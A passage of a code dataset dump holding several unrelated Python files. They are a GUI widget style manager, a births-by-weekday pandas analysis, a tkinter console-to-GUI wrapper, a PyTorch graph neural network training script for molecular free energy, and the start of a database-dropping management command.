dict.\n style = generate_new_style ()\n button.style = WidgetStyle (style)\n\n Style files\n -----------\n A style file is a key-value pair association of style entries for\n widgets. It can be loaded and used by the Style.load() method to set\n specific themes and styles for the widgets. The style files use the\n python syntax and contain key-value pairs of style information for\n the specific widgets. The general syntax looks like follows:\n\n widgetclassname = WidgetStyle ({ style_entry : { value } })\n\n An example style file entry for the Button widget class can look\n like the following:\n\n button = { 'bgcolor' :{ STATE_NORMAL : (200, 100, 0) },\n 'fgcolor' : { STATE_NORMAL : (255, 0, 0) },\n 'shadow' : 5 }\n\n The above example will set the bgcolor[STATE_NORMAL] color style\n entry for the button widget class to (200, 100, 0), the\n fgcolor[STATE_NORMAL] color style entry to (255, 0, 0) and the\n 'shadow' value for the border size to 5. Any other value of the\n style will remain untouched.\n\n Loading a style while running an application does not have any\n effect on widgets\n\n * with own styles set via the BaseWidget.get_style() method,\n * already drawn widgets using the default style.\n \n The latter ones need to be refreshed via the set_dirty()/update()\n methods explicitly to make use of the new style.\n \n Style files allow user-defined variables, which are prefixed with an\n underscore. A specific color thus can be stored in a variable to allow\n easier access of it.\n \n _red = (255, 0, 0)\n ___myown_font = 'foo/bar/font.ttf'\n\n Examples\n --------\n The OcempGUI module contains a file named 'default.rc' in the themes\n directory of the installation, which contains several style values\n for the default appearance of the widgets. Additional information\n can be found in the manual of OcempGUI, too.\n\n Attributes:\n styles - A dictionary with the style definitions of various elements.\n engine - The drawing engine, which takes care of drawing elements.\n \"\"\"\n\n __slots__ = [\"styles\", \"_engine\"]\n \n def __init__ (self):\n # Initialize the default style.\n self.styles = {\n \"default\" : WidgetStyle ({\n \"bgcolor\" : WidgetStyle ({ STATE_NORMAL : (234, 228, 223),\n STATE_ENTERED : (239, 236, 231),\n STATE_ACTIVE : (205, 200, 194),\n STATE_INSENSITIVE : (234, 228, 223) }),\n \"fgcolor\" : WidgetStyle ({ STATE_NORMAL : (0, 0, 0),\n STATE_ENTERED : (0, 0, 0),\n STATE_ACTIVE : (0, 0, 0),\n STATE_INSENSITIVE : (204, 192, 192) }),\n \"lightcolor\" : WidgetStyle ({ STATE_NORMAL : (245, 245, 245),\n STATE_ENTERED : (245, 245, 245),\n STATE_ACTIVE : (30, 30, 30),\n STATE_INSENSITIVE : (240, 240, 240)\n }),\n \"darkcolor\" : WidgetStyle ({ STATE_NORMAL : (30, 30, 30),\n STATE_ENTERED : (30, 30, 30),\n STATE_ACTIVE : (245, 245, 245),\n STATE_INSENSITIVE : (204, 192, 192)\n }),\n \"bordercolor\" : WidgetStyle ({ STATE_NORMAL : (0, 0, 0),\n STATE_ENTERED : (0, 0, 0),\n STATE_ACTIVE : (0, 0, 0),\n STATE_INSENSITIVE : (204, 192, 192)\n }),\n \"shadowcolor\" : ((100, 100, 100), (130, 130, 130)),\n \"image\" : WidgetStyle ({ STATE_NORMAL : None,\n STATE_ENTERED : None,\n STATE_ACTIVE : None,\n STATE_INSENSITIVE : None }),\n \"font\" : WidgetStyle ({ \"name\" : None,\n \"size\" : 16,\n \"alias\" : True,\n \"style\" : 0 }),\n \"shadow\" : 2 })\n }\n\n # Load the default style and theme engine.\n self.load (os.path.join (DEFAULTDATADIR, \"themes\", \"default\",\n default.RCFILE))\n self.set_engine (default.DefaultEngine (self))\n\n def get_style (self, cls):\n \"\"\"S.get_style (...) -> WidgetStyle\n \n Returns the style for a specific widget class.\n\n Returns the style for a specific widget class. If no matching\n entry was found, the method searches for the next upper\n entry of the class's __mro__. If it reaches the end of the\n __mro__ list without finding a matching entry, the\n default style will be returned.\n \"\"\"\n classes = [c.__name__.lower () for c in cls.__mro__]\n for name in classes:\n if name in self.styles:\n return self.styles[name]\n return self.styles.setdefault (cls.__name__.lower (), WidgetStyle ())\n\n def get_style_entry (self, cls, style, key, subkey=None):\n \"\"\"S.get_style_entry (...) -> value\n\n Gets a style entry from the style dictionary.\n\n Gets a entry from the style dictionary. If the entry could not\n be found, the method searches for the next upper entry of the\n __mro__. If it reaches the end of the __mro__ list without\n finding a matching entry, it will try to return the entry from\n the 'default' style dictionary.\n \"\"\"\n deeper = subkey != None\n if key in style:\n if deeper:\n if subkey in style[key]:\n return style[key][subkey]\n else:\n return style[key]\n\n styles = self.styles\n classes = [c.__name__.lower () for c in cls.__mro__]\n for name in classes:\n if name in styles:\n style = styles[name]\n # Found a higher level class style, check it.\n if key in style:\n if deeper:\n if subkey in style[key]:\n return style[key][subkey]\n else:\n return style[key]\n\n # None found, refer to the default.\n if deeper:\n return styles[\"default\"][key][subkey]\n return styles[\"default\"][key]\n\n def copy_style (self, cls):\n \"\"\"S.copy_style (...) -> WidgetStyle\n\n Creates a plain copy of a specific style.\n\n Due to the cascading ability of the Style class, an existing\n style will be filled with the entries of the 'default' style\n dictionary which do not exist in it.\n \"\"\"\n style = copy.deepcopy (self.get_style (cls))\n default = self.styles[\"default\"]\n for key in default:\n if key not in style:\n style[key] = copy.deepcopy (default[key])\n else:\n sub = default[key]\n # No dicts anymore\n for subkey in default[key]:\n style[key][subkey] = copy.deepcopy (sub[subkey])\n return style\n \n def load (self, file):\n \"\"\"S.load (...) -> None\n\n Loads style definitions from a file.\n\n Loads style definitions from a file and adds them to the\n 'styles' attribute. Already set values in this dictionary will\n be overwritten.\n \"\"\"\n glob_dict = {}\n loc_dict = {}\n exec (open(file).read(), glob_dict, loc_dict)\n setdefault = self.styles.setdefault\n for key in loc_dict:\n # Skip the Constants import directive and\n # any user-defined variable.\n if key.startswith (\"_\") or (key == \"Constants\"): \n continue\n\n # Search the style or create a new one from scratch.\n entry = setdefault (key, WidgetStyle ())\n\n # Look up all entries of our style keys and add them to the\n # style.\n widget = loc_dict[key]\n for key in widget:\n if type (widget[key]) == dict:\n if key not in entry:\n entry[key] = WidgetStyle ()\n for subkey in widget[key]:\n entry[key][subkey] = widget[key][subkey]\n else:\n entry[key] = widget[key]\n\n def create_style_dict (self):\n \"\"\"Style.create_style_dict () -> dict\n\n\tCreates a new style dictionary.\n\n Creates a new unfilled style dictionary with the most necessary\n entries needed by the Style class specifications.\n \"\"\"\n style = WidgetStyle ({\n \"bgcolor\" : WidgetStyle ({ STATE_NORMAL : (0, 0, 0),\n STATE_ENTERED : (0, 0, 0),\n STATE_ACTIVE : (0, 0, 0),\n STATE_INSENSITIVE : (0, 0, 0) }),\n \"fgcolor\" : WidgetStyle ({ STATE_NORMAL : (0, 0, 0),\n STATE_ENTERED : (0, 0, 0),\n STATE_ACTIVE : (0, 0, 0),\n STATE_INSENSITIVE : (0, 0, 0) }),\n \"lightcolor\" : WidgetStyle ({ STATE_NORMAL : (0, 0, 0),\n STATE_ENTERED : (0, 0, 0),\n STATE_ACTIVE : (0, 0, 0),\n STATE_INSENSITIVE : (0, 0, 0) }),\n \"darkcolor\" : WidgetStyle ({ STATE_NORMAL : (0, 0, 0),\n STATE_ENTERED : (0, 0, 0),\n STATE_ACTIVE : (0, 0, 0),\n STATE_INSENSITIVE : (0, 0, 0) }),\n \"bordercolor\" : WidgetStyle ({ STATE_NORMAL : (0, 0, 0),\n STATE_ENTERED : (0, 0, 0),\n STATE_ACTIVE : (0, 0, 0),\n STATE_INSENSITIVE : (0, 0, 0) }),\n \"shadowcolor\": ((0, 0, 0), (0, 0, 0)),\n \"image\" : WidgetStyle ({ STATE_NORMAL : None,\n STATE_ENTERED : None,\n STATE_ACTIVE : None,\n STATE_INSENSITIVE : None }),\n \"font\" : WidgetStyle ({ \"name\" : None,\n \"size\" : 0,\n \"alias\" : False,\n \"style\" : 0 }),\n \"shadow\" : 0\n })\n return style\n\n def get_border_size (self, cls=None, style=None, bordertype=BORDER_FLAT):\n \"\"\"S.get_border_size (...) -> int\n\n Gets the border size for a specific border type and style.\n\n Gets the size of a border in pixels for the specific border type\n and style. for BORDER_NONE the value will be 0 by\n default. BORDER_FLAT will always return a size of 1.\n The sizes of other border types depend on the passed style.\n\n If no style is passed, the method will try to retrieve a style\n using the get_style() method.\n\n Raises a ValueError, if the passed bordertype argument is\n not a value of the BORDER_TYPES tuple.\n \"\"\"\n if bordertype not in BORDER_TYPES:\n raise ValueError (\"bordertype must be a value from BORDER_TYPES\")\n\n if not style:\n style = self.get_style (cls)\n\n if bordertype == BORDER_FLAT:\n return 1\n elif bordertype in (BORDER_SUNKEN, BORDER_RAISED):\n return self.get_style_entry (cls, style, \"shadow\")\n elif bordertype in (BORDER_ETCHED_IN, BORDER_ETCHED_OUT):\n return self.get_style_entry (cls, style, \"shadow\") * 2\n return 0\n\n def set_engine (self, engine):\n \"\"\"S.set_engine (...) -> None\n\n Sets the drawing engine to use for drawing elements.\n \"\"\"\n if engine == None:\n raise TypeError (\"engine must not be None\")\n self._engine = engine\n\n engine = property (lambda self: self._engine,\n lambda self, var: self.set_engine (var),\n doc = \"The drawing engine, which draws elements.\")\n","sub_path":"ocempgui/widgets/Style.py","file_name":"Style.py","file_ext":"py","file_size_in_byte":25284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"532924353","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 17 15:18:38 2019\n\n@author: marti\n\"\"\"\n\nimport pandas as pd\nimport datetime as dt \n\nbirths = pd.read_csv('births.csv')\nbirths = births.dropna() # drop na data \n\ndef is_leap(year) : #test whether or not year is leap\n return (year%4==0)\n\n###### drop non sens data from biths df ########\n \nlabels = [] # labels to drop from the dataset\nthirty_one = [1,3,5,7,8,10,12]\nthirty = [4,6,9,11]\nfor i in range(len(births)) : \n if births['month'][i] == 2 : #in february\n if is_leap(births['year'][i]) : # in leap_year\n if births['day'][i] > 29 : \n labels.append(i)\n else :\n if births['day'][i] > 28 : \n labels.append(i)\n \n if births['month'][i] in thirty : # in 30 days' months\n if births['day'][i] > 30 : \n labels.append(i)\n \n if births['month'][i] in thirty_one : # in 31 days' months\n if births['day'][i] > 31 : \n labels.append(i)\n \nbirths = births.drop(labels, axis='index') # drop non sens data\n\n##### transform year, month, day colones to a date one ######\n\ndate = {'date':[]}\nfor index in births.index: # create date Serie \n date['date'].append(dt.date(births['year'][index],\n births['month'][index],\n int(births['day'][index])))\n # date is now a datetime Series \n\ndate = pd.DataFrame(date) # date is now df so we can merge \n\nbirths_transformed = pd.merge(births.copy()[['gender','births']], date,\n left_on=births.index, right_on = date.index)\n\ndel births_transformed['key_0']\n\n## group the data by date and agregate male and female birhts by date ##\ngb = births_transformed.groupby('date')['births'].sum()\ngb = pd.DataFrame(gb)\n\n##### extact 3 dataframes : 60s, 70s, 80s ######\n\n# before 1970, January, the 1st\nsixties = gb[gb.index.values < dt.date(1970, 1, 1)]\n\n# between before 1970, January, the 1st and 1980, January, the 1st\nseventies = gb[~(dt.date(1970, 1, 1) <= gb.index.values) ^ \n (gb.index.values < dt.date(1980, 1, 1))] \n# not xor to achieve bool Array conjontion\n\n# after 1980, January, the 1st\nheighties = gb[gb.index.values >= dt.date(1980, 1, 1)]\n\n#### add a new column 'weekDay' in each DataFrame ####\n\nweekDays = ['Monday', 'Tuesday', 'Wednesday', 'Thursday',\n 'Friday', 'Saturday', 'Sunday']\n\ndfs = [sixties, seventies, heighties]\n\nfor i in range(len(dfs)) : \n temp = {'weekDay' : []}\n for date in dfs[i].index : # we fill temp with weekDay values\n temp['weekDay'].append(weekDays[date.weekday()]) # date.weekday()\n temp_df = pd.DataFrame(temp) # retourne un int (0 -> 6)\n dfs[i] = pd.merge(dfs[i], temp_df, on=dfs[i].index)\n\n#### groupe by weekDay the aggregate by 'birth' (sum) #####\n \ndfs[0] = pd.DataFrame(dfs[0].groupby('weekDay')['births'].sum())\ndfs[1] = pd.DataFrame(dfs[1].groupby('weekDay')['births'].sum())\ndfs[2] = pd.DataFrame(dfs[2].groupby('weekDay')['births'].sum())\n\n#### sorting the data by weekDay ####\nfor i in range(len(dfs)) : \n df = dfs[i].copy()\n df.index = weekDays\n for day in weekDays : \n df['births'][day] = dfs[i]['births'][day]\n dfs[i] = df \n \nsixties = dfs[0]\nseventies = dfs[1]\nheighties = dfs[2]\n\n####### extract DataFarme to CSV ##########\nsixties.to_csv(path_or_buf = '60s.csv')\nseventies.to_csv(path_or_buf = '70s.csv')\nheighties.to_csv(path_or_buf = '80s.csv')","sub_path":"transformation_csv.py","file_name":"transformation_csv.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"314513001","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 1 12:14:20 2019\r\n\r\n@author: SakataWoolley\r\n\"\"\"\r\n\r\n\"\"\"\r\nLibrary for quickly converting a console application into a gui application.\r\nIncludes threading and queues, custom commands, and redirecting stdout.\r\n\"\"\"\r\nimport queue\r\nimport threading\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import scrolledtext\r\n\r\n\r\nclass TScrolledText(scrolledtext.ScrolledText):\r\n \"\"\"\r\n Modified ScrolledText widget to include queue, methods to redirect stdout, and auto-disable editing.\r\n \"\"\"\r\n def __init__(self, master, **options):\r\n scrolledtext.ScrolledText.__init__(self, master, **options)\r\n self.text_queue = queue.Queue()\r\n self.update_me()\r\n\r\n def write(self, line):\r\n \"\"\"\r\n This replaces stdout.write\r\n \"\"\"\r\n self.text_queue.put(line)\r\n\r\n def clear(self):\r\n self.config(state=\"normal\")\r\n self.delete(1.0, END)\r\n self.config(state=\"disabled\")\r\n\r\n def flush(self):\r\n \"\"\"\r\n This replaces stdout.flush\r\n Unused by queue\r\n \"\"\"\r\n pass\r\n\r\n def update_me(self):\r\n if not self.text_queue.empty():\r\n line = self.text_queue.get_nowait()\r\n self[\"state\"] = \"normal\"\r\n self.insert(END, str(line))\r\n self[\"state\"] = \"disabled\"\r\n self.see(END)\r\n self.update_idletasks()\r\n else:\r\n pass\r\n self.after(100, self.update_me)\r\n\r\n\r\nclass CmdGUI:\r\n \"\"\"\r\n Handles gui creation and interactions\r\n \"\"\"\r\n def __init__(self):\r\n self.commands = {\"help\": self.help_menu, \"themes\": self.list_themes} # Commands to run when nothing is running\r\n self.defaults = {} # Commands always available (during loops)\r\n self.loop_in_progress = False\r\n self.wintitle = \"CmdGUI Window\"\r\n\r\n # Create main window # TODO: Custom Themes\r\n self.root = Tk()\r\n self.root.title(self.wintitle)\r\n self.root.grid()\r\n self.root.columnconfigure(0, weight=1)\r\n self.root.rowconfigure(0, weight=1)\r\n self.root.minsize(width=472, height=348)\r\n\r\n # Create Frame covering entire window (for styling, no practical use)\r\n self.mainframe = ttk.Frame(self.root, padding=(5, 5, 5, 5), borderwidth=5, relief=\"groove\")\r\n self.mainframe.grid(column=0, row=0, sticky=(N, W, E, S))\r\n self.mainframe.columnconfigure(0, weight=2)\r\n self.mainframe.rowconfigure(0, weight=2)\r\n\r\n # Create Frame containing output text area\r\n self.outframe = ttk.Frame(self.mainframe, padding=(3, 3, 3, 3))\r\n self.outframe.grid(column=0, row=0, sticky=(N, W, E, S))\r\n self.outframe.columnconfigure(0, weight=2)\r\n self.outframe.rowconfigure(0, weight=2)\r\n\r\n # Create Frame containing input text area\r\n self.inframe = ttk.Frame(self.mainframe, padding=(3, 3, 3, 3))\r\n self.inframe.grid(column=0, row=1, sticky=(N, W, E, S))\r\n self.inframe.columnconfigure(0, weight=2)\r\n self.inframe.rowconfigure(0, weight=2)\r\n\r\n # Create Text output widget\r\n self.txtoutput = TScrolledText(self.outframe, wrap=\"word\", state=\"disabled\")\r\n self.txtoutput.grid(column=0, row=0, sticky=(N, W, E, S))\r\n self.commands['clear'] = self.txtoutput.clear\r\n\r\n # Create label for user messages\r\n self.usermsg = StringVar()\r\n self.usermsg.set(\"Please enter a command. (type help for a list)\")\r\n self.usermsg_traceid = self.usermsg.trace(\"w\", self.reset_msg)\r\n self.msglabel = Label(self.inframe, textvariable=self.usermsg)\r\n self.msglabel.grid(column=0, row=0, sticky=(W, N, E))\r\n\r\n # Create Text input widget\r\n self.txtinput = Text(self.inframe, height=4, wrap=\"word\")\r\n self.txtinput.grid(column=0, row=1, sticky=(W, E, S))\r\n self.txtinput.bind(\"\", self.onenter) # Send command when pressing enter\r\n\r\n # Create enter/submit button\r\n self.enterbutton = Button(self.inframe, text=\"Enter\", command=self.onenter)\r\n self.enterbutton.grid(column=1, row=1, sticky=(N, W, E, S))\r\n\r\n # Redirect stdout to gui\r\n sys.stdout = self.txtoutput\r\n sys.stderr = sys.stdout\r\n\r\n self.txtinput.focus_set()\r\n\r\n self.theme = ttk.Style()\r\n self.theme.theme_use('alt')\r\n\r\n def onenter(self, event=None): # TODO: Explore creating commands using a class\r\n \"\"\"\r\n Sends the value (function) of key (command) to be run by proc_exec.\r\n \"\"\"\r\n cmd = self.txtinput.get(\"1.0\", \"1.0 wordend\").strip().lower()\r\n cmd_arg = self.txtinput.get(\"1.0 wordend +1c\", \"end -1c\")\r\n if cmd in self.commands.keys() and not self.loop_in_progress:\r\n self.proc_exec(self.commands[cmd], arg=cmd_arg)\r\n elif cmd in self.defaults.keys():\r\n self.proc_exec(self.defaults[cmd], arg=cmd_arg)\r\n else:\r\n self.usermsg.set(\"Invalid Command\")\r\n self.txtinput.delete(1.0, END)\r\n return 'break'\r\n\r\n def proc_exec(self, task, arg=None):\r\n \"\"\"\r\n Runs designated function with threading\r\n \"\"\"\r\n if arg is None or arg is \"\":\r\n tp = threading.Thread(target=task)\r\n else:\r\n tp = threading.Thread(target=task, args=(arg,))\r\n tp.start()\r\n\r\n def reset_msg(self, *args):\r\n \"\"\"\r\n Changes msglabel for 3 seconds, then back.\r\n \"\"\"\r\n self.usermsg.trace_vdelete(\"w\", self.usermsg_traceid)\r\n t_msg = threading.Timer(3.0, self.reset_msg2)\r\n t_msg.start()\r\n\r\n def reset_msg2(self):\r\n self.usermsg.set(\"Please enter a command. (type help for a list)\")\r\n self.usermsg_traceid = self.usermsg.trace(\"w\", self.reset_msg)\r\n\r\n def help_menu(self):\r\n self.txtoutput.clear()\r\n print(\"Regular commands list:\")\r\n print(list(self.commands.keys()))\r\n print(\"Special commands list:\")\r\n print(list(self.defaults.keys()))\r\n\r\n def list_themes(self):\r\n print(self.theme.theme_names())\r\n\r\n\r\n\"\"\"\r\nThe below code is included as a demo of the library.\r\n\"\"\"\r\nif __name__ == \"__main__\":\r\n from time import strftime\r\n\r\n demo = CmdGUI()\r\n demo.wintitle = \"CmdGUI Demo\" # Sets the main window title\r\n stop = False\r\n\r\n def infloop_test():\r\n \"\"\"\r\n An example of running a looping function with tkinter\r\n Sets the initial time display.\r\n With infloop_test2\r\n \"\"\"\r\n demo.txtoutput.clear()\r\n print(strftime(\"%a - %b %d, %Y %H:%M:%S\"))\r\n demo.usermsg.set(\"Type stop and press enter to stop the loop.\")\r\n infloop_test2()\r\n\r\n def infloop_test2():\r\n \"\"\"\r\n Updates the time display every 500ms until stop command is given.\r\n \"\"\"\r\n global stop\r\n demo.loop_in_progress = True\r\n\r\n if not stop:\r\n curtime = strftime(\"%a - %b %d, %Y %H:%M:%S\")\r\n time_display = demo.txtoutput.get(1.0, 1.28) # Read all characters on the first line\r\n curtime = list(curtime)\r\n time_display = list(time_display)\r\n for index, char in enumerate(time_display):\r\n if curtime[index] != time_display[index]:\r\n cursor = \"1.{0}\".format(index) # Use number of current character as column index\r\n demo.txtoutput.config(state=\"normal\")\r\n demo.txtoutput.delete(cursor) # Delete char at cursor\r\n demo.txtoutput.insert(cursor, curtime[index]) # Insert new char, if changed at cursor\r\n demo.txtoutput.config(state=\"disabled\")\r\n demo.txtoutput.after(500, infloop_test2) # Calls infloop_test2 over again after 500ms\r\n else:\r\n demo.usermsg.set(\"Time loop has been stopped.\")\r\n demo.loop_in_progress = False\r\n stop = False\r\n\r\n def end_loop():\r\n \"\"\"\r\n Used to change global variable stop to True for stopping loops.\r\n \"\"\"\r\n global stop\r\n stop = True\r\n\r\n def forloop_test():\r\n for i in range(10):\r\n print(\"This is step \" + str(i) + \".\")\r\n\r\n def say(*args): # Very basic attempt at using arguments with commands, treats anything after say as text\r\n\r\n print(*args)\r\n\r\n\r\n # Create commands to be typed to run each function\r\n demo.commands['infloop'] = infloop_test\r\n demo.defaults[\"stop\"] = end_loop\r\n demo.commands['forloop'] = forloop_test\r\n demo.commands['say'] = say\r\n\r\n demo.root.mainloop()","sub_path":"ThreadingExample.py","file_name":"ThreadingExample.py","file_ext":"py","file_size_in_byte":8570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"517490497","text":"# system imports\nimport pickle\nimport numpy as np\nfrom warnings import warn\nimport random\nimport json\nfrom datetime import datetime\nimport time\nimport os\nfrom pprint import pprint\nimport tqdm\n\n# pytorch imports\nimport torch\nfrom torch.nn import L1Loss\nfrom torch_geometric.data import Data\n\n# Custom imports\nfrom helpers import mol2graph\nfrom helpers.EarlyStopping import EarlyStopping\nfrom helpers.scale import normalize\nfrom GraphNet import UnweightedDebruijnGraphNet\n\nassert torch.__version__ == \"1.5.0\" # Needed for pytorch-geometric\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nif device == \"cpu\":\n warn(\"You are using CPU instead of CUDA. The computation will be longer...\")\n\n\nseed = 7123\n# seed = 76583\nrandom.seed(seed)\ntorch.manual_seed(seed)\n\n# Data parameters\nDATASET_TYPE = \"old\"\nDATA_DIR = f\"ala_dipep_{DATASET_TYPE}\"\nTARGET_FILE = f\"free-energy-{DATASET_TYPE}.dat\"\nN_SAMPLES = 3815 if DATASET_TYPE == \"small\" else 21881 if DATASET_TYPE == \"medium\" else 50000 if DATASET_TYPE == \"old\" else 64074 if DATASET_TYPE == \"big\" else 48952\nNORMALIZE_DATA = True\nNORMALIZE_TARGET = True\nOVERWRITE_PICKLES = False\nUNSEEN_REGION = None # can be \"left\", \"right\" or None. When is \"left\" we train on \"right\" and predict on \"left\"\n\nif not OVERWRITE_PICKLES:\n warn(\"You are using existing pickles, change this setting if you add features to nodes/edges \")\n\n# Parameters\nrun_parameters = {\n \"graph_type\": \"De Bruijn\",\n \"out_channels\": 4,\n \"convolution\": \"GraphConv\",\n \"convolutions\": 3,\n \"learning_rate\": 0.0001 if NORMALIZE_TARGET else 0.001,\n \"epochs\": 2000,\n \"patience\": 70,\n \"normalize_target\": NORMALIZE_TARGET,\n \"dataset_perc\": 1,\n \"shuffle\": False,\n \"train_split\": 0.7,\n \"validation_split\": 0.1,\n \"unseen_region\": UNSEEN_REGION\n}\n\n# To check config at the beginning\npprint(run_parameters)\n\nif run_parameters[\"dataset_perc\"] < 1:\n warn(\"You are not using the full dataset. Be aware of this\")\n\ncriterion = L1Loss()\n# criterion = MSELoss()\n\nif UNSEEN_REGION is not None:\n seen_region = 'right' if UNSEEN_REGION == 'left' else 'left'\n warn(f\"Training on {seen_region} minima only. Testing on {UNSEEN_REGION} minima.\")\n\n with open(f\"{DATA_DIR}/left.json\", \"r\") as l:\n left = json.load(l)\n\n with open(f\"{DATA_DIR}/right.json\", \"r\") as r:\n right = json.load(r)\n\n # Training on everything else\n if UNSEEN_REGION == \"left\":\n indexes = left\n else:\n indexes = right\n\n train_ind = [i for i in range(N_SAMPLES) if i not in indexes]\n # half to validation, half to test\n random.shuffle(indexes)\n split = np.int(0.5 * len(indexes))\n validation_ind = indexes[:split]\n test_ind = indexes[split:]\nelse:\n indexes = [i for i in range(N_SAMPLES)]\n random.shuffle(indexes)\n indexes = indexes[:np.int(run_parameters[\"dataset_perc\"]*N_SAMPLES)]\n split = np.int(run_parameters[\"train_split\"]*len(indexes))\n train_ind = indexes[:split]\n split_2 = split + np.int(run_parameters[\"validation_split\"]*len(indexes))\n validation_ind = indexes[split:split_2]\n test_ind = indexes[split_2:]\n\ngraph_samples = []\nfor i in range(N_SAMPLES):\n try:\n if OVERWRITE_PICKLES:\n raise FileNotFoundError\n\n with open(\"{}/{}-dihedrals-graph.pickle\".format(DATA_DIR, i), \"rb\") as p:\n debruijn = pickle.load(p)\n\n except FileNotFoundError:\n atoms, edges, angles, dihedrals = mol2graph.get_richgraph(\"{}/{}.json\".format(DATA_DIR, i))\n\n debruijn = mol2graph.get_debruijn_graph(atoms, angles, dihedrals, shuffle=run_parameters[\"shuffle\"])\n\n if OVERWRITE_PICKLES:\n with open(\"{}/{}-dihedrals-graph.pickle\".format(DATA_DIR, i), \"wb\") as p:\n pickle.dump(debruijn, p)\n\n graph_samples.append(debruijn)\n\nwith open(TARGET_FILE, \"r\") as t:\n target = torch.as_tensor([torch.tensor([float(v)]) for v in t.readlines()][:N_SAMPLES])\n if not NORMALIZE_TARGET:\n target = target.reshape(shape=(len(target), 1))\n\n# Compute STD and MEAN only on training data\ntarget_mean, target_std = 0, 1\nif NORMALIZE_TARGET:\n # training_target = torch.tensor([target[i] for i in train_ind])\n target_std = torch.std(target, dim=0)\n target_mean = torch.mean(target, dim=0)\n target = ((target - target_mean) / target_std).reshape(shape=(len(target), 1))\n\n# with open(f\"{DATA_DIR}/dihedrals.json\", \"w\") as j:\n# json.dump([sample[2] for sample in graph_samples], j)\n\nif NORMALIZE_DATA:\n # Single graph normalization\n samples = normalize(graph_samples, train_ind, False)\nelse:\n samples = graph_samples\n\ndataset = []\nfor i, sample in enumerate(samples):\n dataset.append(\n Data(x=sample[0], edge_index=sample[1], y=target[i]).to(device)\n )\n\nprint(\"Dataset loaded\")\n\n# TODO: batches\nmodel = UnweightedDebruijnGraphNet(dataset[0], out_channels=run_parameters[\"out_channels\"]).to(device)\n\nstopping = EarlyStopping(patience=run_parameters[\"patience\"])\noptimizer = torch.optim.SGD(model.parameters(), lr=run_parameters[\"learning_rate\"], momentum=0.8)\n# TODO: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min',\n# factor=0.7, patience=5,\n# min_lr=0.00001)\n# TODO: print a good summary of the model https://github.com/szagoruyko/pytorchviz\nprint(model)\nstart = time.time()\nfor i in range(run_parameters[\"epochs\"]):\n model.train()\n random.shuffle(train_ind)\n for number, j in enumerate(tqdm.tqdm(train_ind)):\n # Forward pass: Compute predicted y by passing x to the model\n y_pred = model(dataset[j].to(device))\n\n # Compute and print loss\n loss = criterion(y_pred, dataset[j].y)\n\n # Zero gradients, perform a backward pass, and update the weights.\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # Compute validation loss\n model.eval()\n val_losses = []\n # save some memory\n with torch.no_grad():\n for j in validation_ind:\n y_pred = model(dataset[j].to(device))\n val_loss = criterion(y_pred, dataset[j].y)\n val_losses.append(val_loss.item())\n\n val_loss = torch.mean(torch.as_tensor(val_losses)).item()\n if NORMALIZE_TARGET:\n val_loss = val_loss*target_std\n print(\"Epoch {} - Validation MAE: {:.2f}\".format(i+1, val_loss))\n\n # Check Early Stopping\n if stopping.check(val_loss):\n run_parameters[\"epochs\"] = i+1\n print(f\"Training finished because of early stopping. Best loss on validation: {stopping.best_score}\")\n break\n\nduration = (time.time() - start) / 60.0 # Minutes\nhours = np.int(np.floor(duration / 60.0))\nminutes = np.int(np.floor(duration - hours*60))\n\npredictions = []\nerrors = []\nmodel.eval()\nfor j in test_ind:\n # Forward pass: Compute predicted y by passing x to the model\n prediction = model(dataset[j].to(device))\n error = prediction - dataset[j].y\n predictions.append(prediction.item())\n errors.append(error.item())\n\n# Compute MAE\nmae = np.absolute(np.asarray(errors)).mean()\nif NORMALIZE_TARGET:\n mae *= target_std\nprint(\"Mean Absolute Error: {:.2f}\".format(mae))\n\n# Save predictions as json\ndirectory = f\"logs/{DATASET_TYPE}-{datetime.now().strftime('%m%d-%H%M')}-mae:{mae:.2f}\"\nos.makedirs(directory)\nwith open(f\"{directory}/result.json\", \"w\") as f:\n json.dump({\n \"run_parameters\": run_parameters,\n \"duration\": f\"{hours}h{minutes}m\",\n \"predicted\": predictions,\n \"target\": [float(target[i].item()) for i in test_ind],\n \"target_std\": float(target_std),\n \"target_mean\": float(target_mean),\n \"test_frames\": test_ind,\n \"train_frames\": train_ind,\n }, f)\n\ntorch.save({\n \"parameters\": model.state_dict()\n}, f\"{directory}/parameters.pt\")\n\n\n# !!!!. Visualize weights and outputs from layers to see how the NN performs\n\n# !. Read paper on NNConv after having read slides from geometric deep learning\n# !. Understand what is graph attention and try pooling methods (adaptive pooling from pytorch seems to work)\n# Try to use batch to avoid loss oscillation (makes sense?)\n# (....) Try HypergraphConv layer\n\n# ? (To investigate) use dataset batching https://pytorch-geometric.readthedocs.io/en/latest/notes/batching.html\n# ?. Add dropout layer if needed\n# ?. check if should use edge_weight or edge_attributes\n\n# Plus: Understand what pos= on Data means (should not change since I don't use it in the FirstGraphNet)\n","sub_path":"debruijn.py","file_name":"debruijn.py","file_ext":"py","file_size_in_byte":8558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"336527637","text":"import os\nfrom sqlalchemy.engine.url import make_url\n\nfrom orun.core.management import commands\nfrom orun.db import connections\nfrom .createdb import _create_connection\n\n\n@commands.command('dropdb')\ndef command(database, **options):\n drop(database)\n\n\ndef drop(db):\n db_settings = connections.databases[db]\n url = make_url(db_settings['ENGINE'])\n db_engine = url.drivername.split('+')[0]\n db_name = url.database\n\n if db_engine == 'sqlite' and db_name == ':memory:':\n return\n\n conn = _create_connection(url)\n commands.echo('Dropping db \"%s\"' % db_name)\n\n if db_engine == 'sqlite':\n del conn\n try:\n os.remove(db_name)\n except Exception as e:\n commands.echo(e, err=True)\n elif db_engine == 'postgresql':\n conn.connection.set_isolation_level(0)\n try:\n conn.execute('''SELECT pg_terminate_backend(pid) FROM pg_stat_activity WHERE datname = '%s';''' % db_name)\n conn.execute('''DROP DATABASE \"%s\"''' % db_name)\n except Exception as 